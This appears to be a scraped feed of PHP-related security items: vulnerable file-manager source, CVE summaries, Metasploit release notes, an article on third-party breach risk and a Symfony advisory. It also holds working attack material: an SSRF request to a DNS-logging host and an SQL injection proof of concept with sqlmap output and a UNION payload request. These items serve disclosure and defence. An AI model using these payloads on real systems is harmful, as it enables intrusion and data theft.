An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution.

<?php $config = include 'config/config.php'; //TODO switch to array extract($config, EXTR\_OVERWRITE); include 'include/utils.php'; if ($\_SESSION\['RF'\]\["verify"\] != "RESPONSIVEfilemanager") { response('forbiden', 403)->send(); exit; } $thumb\_pos = strpos($\_POST\['path\_thumb'\], $thumbs\_base\_path); if ($thumb\_pos !=0 || strpos($\_POST\['path\_thumb'\],'../',strlen($thumbs\_base\_path)+$thumb\_pos)!==FALSE || strpos($\_POST\['path'\],'/')===0 || strpos($\_POST\['path'\],'../')!==FALSE || strpos($\_POST\['path'\],'./')===0) { response('wrong path')->send(); exit; } if (isset($\_SESSION\['RF'\]\['language\_file'\]) && file\_exists($\_SESSION\['RF'\]\['language\_file'\])) { //TODO Very bad practice require\_once $\_SESSION\['RF'\]\['language\_file'\]; } else { response('Language file is missing!', 500)->send(); exit; } $base = $current\_path; $path = $current\_path.$\_POST\['path'\]; $cycle = TRUE; $max\_cycles = 50; $i = 0; while($cycle && $i<$max\_cycles) { $i++; if ($path == $base) $cycle\=FALSE; if (file\_exists($path."config.php")) { require\_once $path."config.php"; $cycle = FALSE; } $path = fix\_dirname($path)."/"; $cycle = FALSE; } $path = $current\_path.$\_POST\['path'\]; $path\_thumb = $\_POST\['path\_thumb'\]; if (isset($\_POST\['name'\])) { $name = fix\_filename($\_POST\['name'\],$transliteration,$convert\_spaces, $replace\_with); if (strpos($name,'../') !== FALSE) { response('wrong name', 400)->send(); exit; } } $info = pathinfo($path); if (isset($info\['extension'\]) && !(isset($\_GET\['action'\]) && $\_GET\['action'\]=='delete\_folder') && !in\_array(strtolower($info\['extension'\]), $ext) && $\_GET\['action'\] != 'create\_file') { response('wrong extension', 400)->send(); exit; } if (isset($\_GET\['action'\])) { switch($\_GET\['action'\]) { case 'delete\_file': if ($delete\_files){ unlink($path); if (file\_exists($path\_thumb)) unlink($path\_thumb); $info\=pathinfo($path); if ($relative\_image\_creation){ foreach($relative\_path\_from\_current\_pos as $k\=>$path) { if ($path!="" && $path\[strlen($path)-1\]!="/") $path.="/"; if (file\_exists($info\['dirname'\]."/".$path.$relative\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$relative\_image\_creation\_name\_to\_append\[$k\].".".$info\['extension'\])) { unlink($info\['dirname'\]."/".$path.$relative\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$relative\_image\_creation\_name\_to\_append\[$k\].".".$info\['extension'\]); } } } if ($fixed\_image\_creation) { foreach($fixed\_path\_from\_filemanager as $k\=>$path) { if ($path!="" && $path\[strlen($path)-1\] != "/") $path.="/"; $base\_dir\=$path.substr\_replace($info\['dirname'\]."/", '', 0, strlen($current\_path)); if (file\_exists($base\_dir.$fixed\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$fixed\_image\_creation\_to\_append\[$k\].".".$info\['extension'\])) { unlink($base\_dir.$fixed\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$fixed\_image\_creation\_to\_append\[$k\].".".$info\['extension'\]); } } } } break; case 'delete\_folder': if ($delete\_folders){ if (is\_dir($path\_thumb)) { deleteDir($path\_thumb); } if (is\_dir($path)) { deleteDir($path); if ($fixed\_image\_creation) { foreach($fixed\_path\_from\_filemanager as $k\=>$paths){ if ($paths!="" && $paths\[strlen($paths)-1\] != "/") $paths.="/"; $base\_dir\=$paths.substr\_replace($path, '', 0, strlen($current\_path)); if (is\_dir($base\_dir)) deleteDir($base\_dir); } } } } break; case 'create\_folder': if ($create\_folders) { create\_folder(fix\_path($path,$transliteration,$convert\_spaces, $replace\_with),fix\_path($path\_thumb,$transliteration,$convert\_spaces, $replace\_with)); } break; case 'rename\_folder': if ($rename\_folders){ $name\=fix\_filename($name,$transliteration,$convert\_spaces, $replace\_with); $name\=str\_replace('.','',$name); if (!empty($name)){ if (!rename\_folder($path,$name,$transliteration,$convert\_spaces)) { response(trans('Rename\_existing\_folder'), 403)->send(); exit; } rename\_folder($path\_thumb,$name,$transliteration,$convert\_spaces); if ($fixed\_image\_creation){ foreach($fixed\_path\_from\_filemanager as $k\=>$paths){ if ($paths!="" && $paths\[strlen($paths)-1\] != "/") $paths.="/"; $base\_dir\=$paths.substr\_replace($path, '', 0, strlen($current\_path)); rename\_folder($base\_dir,$name,$transliteration,$convert\_spaces); } } } else { response(trans('Empty\_name'), 400)->send(); exit; } } break; case 'create\_file': if ($create\_text\_files === FALSE) { response(sprintf(trans('File\_Open\_Edit\_Not\_Allowed'), strtolower(trans('Edit'))), 403)->send(); exit; } if (!isset($editable\_text\_file\_exts) || !is\_array($editable\_text\_file\_exts)){ $editable\_text\_file\_exts = array(); } // check if user supplied extension if (strpos($name, '.') === FALSE){ response(trans('No\_Extension').' '.sprintf(trans('Valid\_Extensions'), implode(', ', $editable\_text\_file\_exts)), 400)->send(); exit; } // correct name $old\_name = $name; $name\=fix\_filename($name,$transliteration,$convert\_spaces, $replace\_with); if (empty($name)) { response(trans('Empty\_name'), 400)->send(); exit; } // check extension $parts = explode('.', $name); if (!in\_array(end($parts), $editable\_text\_file\_exts)) { response(trans('Error\_extension').' '.sprintf(trans('Valid\_Extensions'), implode(', ', $editable\_text\_file\_exts)), 400)->send(); exit; } // correct paths $path = str\_replace($old\_name, $name, $path); $path\_thumb = str\_replace($old\_name, $name, $path\_thumb); // file already exists if (file\_exists($path)) { response(trans('Rename\_existing\_file'), 403)->send(); exit; } $content = $\_POST\['new\_content'\]; if (@file\_put\_contents($path, $content) === FALSE) { response(trans('File\_Save\_Error'), 500)->send(); exit; } else { if (is\_function\_callable('chmod') !== FALSE){ chmod($path, 0644); } response(trans('File\_Save\_OK'))->send(); exit; } break; case 'rename\_file': if ($rename\_files){ $name\=fix\_filename($name,$transliteration,$convert\_spaces, $replace\_with); if (!empty($name)) { if (!rename\_file($path,$name,$transliteration)) { response(trans('Rename\_existing\_file'), 403)->send(); exit; } rename\_file($path\_thumb,$name,$transliteration); if ($fixed\_image\_creation) { $info\=pathinfo($path); foreach($fixed\_path\_from\_filemanager as $k\=>$paths) { if ($paths!="" && $paths\[strlen($paths)-1\] != "/") $paths.="/"; $base\_dir = $paths.substr\_replace($info\['dirname'\]."/", '', 0, strlen($current\_path)); if (file\_exists($base\_dir.$fixed\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$fixed\_image\_creation\_to\_append\[$k\].".".$info\['extension'\])) { rename\_file($base\_dir.$fixed\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$fixed\_image\_creation\_to\_append\[$k\].".".$info\['extension'\],$fixed\_image\_creation\_name\_to\_prepend\[$k\].$name.$fixed\_image\_creation\_to\_append\[$k\],$transliteration); } } } } else { response(trans('Empty\_name'), 400)->send(); exit; } } break; case 'duplicate\_file': if ($duplicate\_files) { $name\=fix\_filename($name,$transliteration,$convert\_spaces, $replace\_with); if (!empty($name)) { if (!duplicate\_file($path,$name)) { response(trans('Rename\_existing\_file'), 403)->send(); exit; } duplicate\_file($path\_thumb,$name); if ($fixed\_image\_creation) { $info\=pathinfo($path); foreach($fixed\_path\_from\_filemanager as $k\=>$paths) { if ($paths!="" && $paths\[strlen($paths)-1\] != "/") $paths.= "/"; $base\_dir\=$paths.substr\_replace($info\['dirname'\]."/", '', 0, strlen($current\_path)); if (file\_exists($base\_dir.$fixed\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$fixed\_image\_creation\_to\_append\[$k\].".".$info\['extension'\])) { duplicate\_file($base\_dir.$fixed\_image\_creation\_name\_to\_prepend\[$k\].$info\['filename'\].$fixed\_image\_creation\_to\_append\[$k\].".".$info\['extension'\],$fixed\_image\_creation\_name\_to\_prepend\[$k\].$name.$fixed\_image\_creation\_to\_append\[$k\]); } } } } else { response(trans('Empty\_name'), 400)->send(); exit; } } break; case 'paste\_clipboard': if ( ! isset($\_SESSION\['RF'\]\['clipboard\_action'\], $\_SESSION\['RF'\]\['clipboard'\]\['path'\], $\_SESSION\['RF'\]\['clipboard'\]\['path\_thumb'\]) || $\_SESSION\['RF'\]\['clipboard\_action'\] == '' || $\_SESSION\['RF'\]\['clipboard'\]\['path'\] == '' || $\_SESSION\['RF'\]\['clipboard'\]\['path\_thumb'\] == '') { response()->send(); exit; } $action = $\_SESSION\['RF'\]\['clipboard\_action'\]; $data = $\_SESSION\['RF'\]\['clipboard'\]; $data\['path'\] = $current\_path.$data\['path'\]; $pinfo = pathinfo($data\['path'\]); // user wants to paste to the same dir. nothing to do here... if ($pinfo\['dirname'\] == rtrim($path, '/')) { response()->send(); exit; } // user wants to paste folder to it's own sub folder.. baaaah. if (is\_dir($data\['path'\]) && strpos($path, $data\['path'\]) !== FALSE){ response()->send(); exit; } // something terribly gone wrong if ($action != 'copy' && $action != 'cut'){ response('no action', 400)->send(); exit; } // check for writability if (is\_really\_writable($path) === FALSE || is\_really\_writable($path\_thumb) === FALSE){ response(trans('Dir\_No\_Write').'<br/>'.str\_replace('../','',$path).'<br/>'.str\_replace('../','',$path\_thumb), 403)->send(); exit; } // check if server disables copy or rename if (is\_function\_callable(($action == 'copy' ? 'copy' : 'rename')) === FALSE){ response(sprintf(trans('Function\_Disabled'), ($action == 'copy' ? lcfirst(trans('Copy')) : lcfirst(trans('Cut')))), 403)->send(); exit; } if ($action == 'copy') { rcopy($data\['path'\], $path); rcopy($data\['path\_thumb'\], $path\_thumb); } elseif ($action == 'cut') { rrename($data\['path'\], $path); rrename($data\['path\_thumb'\], $path\_thumb); // cleanup if (is\_dir($data\['path'\]) === TRUE){ rrename\_after\_cleaner($data\['path'\]); rrename\_after\_cleaner($data\['path\_thumb'\]); } } // cleanup $\_SESSION\['RF'\]\['clipboard'\]\['path'\] = NULL; $\_SESSION\['RF'\]\['clipboard'\]\['path\_thumb'\] = NULL; $\_SESSION\['RF'\]\['clipboard\_action'\] = NULL; break; case 'chmod': $mode = $\_POST\['new\_mode'\]; $rec\_option = $\_POST\['is\_recursive'\]; $valid\_options = array('none', 'files', 'folders', 'both'); $chmod\_perm = (is\_dir($path) ? $chmod\_dirs : $chmod\_files); // check perm if ($chmod\_perm === FALSE) { response(sprintf(trans('File\_Permission\_Not\_Allowed'), (is\_dir($path) ? lcfirst(trans('Folders')) : lcfirst(trans('Files')) )), 403)->send(); exit; } // check mode if (!preg\_match("/^\[0-7\]{3}$/", $mode)){ response(trans('File\_Permission\_Wrong\_Mode'), 400)->send(); exit; } // check recursive option if (!in\_array($rec\_option, $valid\_options)){ response("wrong option", 400)->send(); exit; } // check if server disabled chmod if (is\_function\_callable('chmod') === FALSE){ response(sprintf(trans('Function\_Disabled'), 'chmod'), 403)->send(); exit; } $mode = "0".$mode; $mode = octdec($mode); rchmod($path, $mode, $rec\_option); break; case 'save\_text\_file': $content = $\_POST\['new\_content'\]; // $content = htmlspecialchars($content); not needed // $content = stripslashes($content); // no file if (!file\_exists($path)) { response(trans('File\_Not\_Found'), 404)->send(); exit; } // not writable or edit not allowed if (!is\_writable($path) || $edit\_text\_files === FALSE) { response(sprintf(trans('File\_Open\_Edit\_Not\_Allowed'), strtolower(trans('Edit'))), 403)->send(); exit; } if (@file\_put\_contents($path, $content) === FALSE) { response(trans('File\_Save\_Error'), 500)->send(); exit; } else { response(trans('File\_Save\_OK'))->send(); exit; } break; default: response('wrong action', 400)->send(); exit; } }

CVE-2022-46604: ResponsiveFilemanager/execute.php at v9.9.5 · trippo/ResponsiveFilemanager

A vulnerability was found in PHPGurukul Employee Leaves Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file changepassword.php. The manipulation of the argument newpassword/confirmpassword leads to weak password requirements. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220021 was assigned to this vulnerability.

CVE-2023-0641

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

*   Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
    
*   Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
    
*   PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
    
*   PR 16689 - Adds support for host addresses in kerberos tickets.
    
*   PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
    
*   PR 16749 - Adds Kerberos Authentication support to WinRM modules.
    
*   PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
    
*   PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
    
*   PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
    
*   PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
    
*   PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
    
*   PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
    
*   PR 17374 - Adds klist command support to list Kerberos tickets in the database.
    
*   PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
    
*   PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
    
*   PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
    
*   PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
    
*   PR 17475 - Enables the datastore\_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
    
*   PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
    
*   PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
    
*   PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
    
*   PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
    
*   PR 17535 - This adds NTLM hash recover to the kerberos/get\_ticket module.
    
*   PR 17539 - Adds additional error handling for Kerberos error codes.
    

*   Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
    
*   Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
    
*   PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
    
*   PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
    
*   PR 17482 - Fixes a connection issue with reverse\_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
    
*   PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
    
*   PR 17497 - This fixes an error where modules that issue certificates (icpr\_cert and now auxiliary/admin/dcerpc/cve\_2022\_26923\_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
    
*   PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
    
*   PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
    
*   PR 17541 - Fixes a crash that occurs when domain option is set to blank.
    
*   PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
    

*   PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require preauthnetication, i.e. AS-REP Roastable accounts, will have the hashes output for offline cracking.
    
*   PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
    
*   PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
    
*   PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
    
*   PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
    
*   PR 17533 - Enhances the auxiliary/admin/kerberos/get\_ticket module with PKINIT functionality.

CVE-2023-0599: Metasploit Release Notes

maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF).

#CVE-2022-47872

maccms10 admin+ ssrf attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#22

Enter the background, click Collect --> Custom interface --> Interface address,

In the name box into payload1:http://7ca8e96e.dns.1433.eu.org.

It can cause ssrf attacks.

Vulnerability name：ssrf attacks

Vulnerability level：Medium risk

Vulnerability location： click Collect --> Custom interface --> Interface address

3.Recurring vulnerabilities and

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: _/_

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect\_id=&_token_\=8d639020c85bde89f9276381d2460046&collect\_name=1111&collect\_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect\_param=%26q%3D1&collect\_type=1&collect\_mid=1&collect\_opt=Ø&collect\_filter=0&collect\_filter\_from=

CVE-2022-47872: CVE-2022-47872/README.md at main · Cedric1314/CVE-2022-47872

The average organization does business with 11 third parties, and 98% of organizations do business with a third party who has suffered a breach, an analysis finds.

Nearly every company does business with — or uses the products of — a third party that has suffered a compromise, thus increasing their security risks.

That's according to data science firm Cyentia Institute, which has issued an analysis that includes external measurements of security from more than 230,000 organizations provided by cybersecurity risk-management firm SecurityScorecard. It found that the average firm had around 10 third-party relationships, and hundreds of indirect fourth-party relationships, with the typical firm having 60 to 90 times more fourth parties than third parties. Nearly all firms (98%) had at least one third-party partner who had suffered a breach, the report stated.

The IT sector has the most third parties, with an average of 25, while the finance sector had the fewest, at 6.5. Those numbers quickly balloon when fourth-party relationships are included, as did their risk. The average firm has an indirect relationship with 200 fourth parties that have had a breach, the analysis found.

The research underscores the sprawling nature of third- and fourth-party relationships for corporations, and the dramatic increase in risk that they can cause, says Wade Baker, founder and partner at the Cyentia Institute.

"Risk goes downhill," he says. "The first parties are more likely to have good security \[risk\] scores than their third parties, and with fourth parties, the numbers really explode. You need to expect \[these firms and products\] to not be up to your standards for security."

That's because while many organizations have become more mature regarding their own cyber risks, few are cognizant of the extended risks, Cyentia and SecurityScorecard stated in the analysis.

"Many organizations are still unaware of the dependencies and exposures inherent to third-party relationships, and simply focus on managing their own security posture," the report stated. "Others are aware of those issues, but don't make vendor decisions based on security and/or require vendors to meet certain standards. Even firms that do establish third-party security requirements can struggle to continually monitor compliance and progress."

    

Almost all companies did business with a third party who had been compromised in the past 2 years. Source: Cyentia Institute and SecurityScorecard

Third-party and supply-chain risk have become significant issues in recent years. And CISOs have become increasing wary of their third-party providers, ever since the compromise of an HVAC supplier led to the breach of retail giant Target.

While the analysis looks at third-party risk, the definition of what a third party is extends not just to vendors and partners, but software providers and open source projects. Now-infamous attacks on software suppliers such as SolarWinds, and vulnerabilities in widely used software components such as Log4J, have raised the visibility of the risk that this arena poses.

The top 5 technologies included in third-party relationships within the data are Google Analytics, Google Tag Manager, Amazon Web Hosting, PHP, and Facebook products — all of which were involved in two-thirds (68%) of third-party relationships, the report stated.

"A lot of these third and fourth party relationships \[involve us\] both agreeing to adhere to certain policies just by virtue of using a product, and now I'm opening up myself to a certain degree of risk," Baker says.

**Risk Rises With Each Hop**

The analysis also found that third parties typically have a weaker security posture than the companies they served. Overall, there is a much higher likelihood that third parties will have security problems, meaning that companies can't assume that all of their third parties are as diligent about security.

"I view it in the same way as all of us knowing we have too many privileges — in general, people have access to more data than they need to do their job," Baker says. "It would be good to reduce the number of third parties, especially if they're not needed, and also be a little bit more choosy."

The data, however, does not suggest a clear path forward, beside becoming more aware of the problem. Baker does not necessarily recommend, for example, that organizations cut the bottom 25% of their third parties from their business. However, evaluating them more closely or more frequently might be more realistic, he says.

"If we really want to protect our supply chains, we've got to we've got to make the weakest link stronger," Baker says. "And I think the analysis is showing that there's a lot of weak links across third parties and fourth parties, and that is where the challenge lies."

Nearly All Firms Have Ties With Breached Third Parties

Description
-----------

When authenticating users Symfony by default regenerates the session ID upon login, but preserves the rest of session attributes. Because this does not clear CSRF tokens upon login, this might enables [same-site attackers](https://canitakeyoursubdomain.name/) to bypass the CSRF protection mechanism by performing an attack similar to a session-fixation.

Resolution
----------

Symfony removes all CSRF tokens from the session on successful login.

The patch for this issue is available [here](https://github.com/symfony/symfony/commit/5909d74ecee359ea4982fcf4331aaf2e489a1fd4) for branch 4.4.

Credits
-------

We would like to thank Marco Squarcina for reporting the issue and Nicolas Grekas for fixing it.

**Package**

composer symfony/security-bundle (Composer)

**Affected versions**

\>= 2.0.0, < 4.4.50

\>= 5.0.0, < 5.4.20

\>= 6.0.0, < 6.0.20

\>= 6.1.0, < 6.1.12

\>= 6.2.0, < 6.2.6

**Patched versions**

4.4.50

5.4.20

6.0.20

6.1.12

6.2.6

composer symfony/symfony (Composer)

\>= 2.0.0, < 4.4.50

\>= 5.0.0, < 5.4.20

\>= 6.0.0, < 6.0.20

\>= 6.1.0, < 6.1.12

\>= 6.2.0, < 6.2.6

4.4.50

5.4.20

6.0.20

6.1.12

6.2.6

**Description**

**Description**

When authenticating users Symfony by default regenerates the session ID upon login, but preserves the rest of session attributes. Because this does not clear CSRF tokens upon login, this might enables same-site attackers to bypass the CSRF protection mechanism by performing an attack similar to a session-fixation.

**Resolution**

Symfony removes all CSRF tokens from the session on successful login.

The patch for this issue is available here for branch 4.4.

**Credits**

We would like to thank Marco Squarcina for reporting the issue and Nicolas Grekas for fixing it.

**References**

*   GHSA-3gv2-29qc-v67m
*   https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2022-24895.yaml
*   https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2022-24895.yaml
*   https://symfony.com/cve-2022-24895

Last updated

Feb 1, 2023

Reviewed

Feb 1, 2023

Published to the GitHub Advisory Database

Feb 1, 2023

 fabpot published to symfony/symfony

Feb 1, 2023

GHSA-3gv2-29qc-v67m: Symfony vulnerable to Session Fixation of CSRF tokens

Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

lmxcms v1.41 was discovered to contain an arbitrary file deletion vulnerability via BackdbAction.class.php.

CVE-2023-23136

lmxcms v1.41 was discovered to contain an arbitrary file read vulnerability via TemplateAction.class.php.

CVE-2022-48094

Seacms v12.7 was discovered to contain a remote code execution (RCE) vulnerability via the ip parameter at admin_ ip.php.

Tag

#php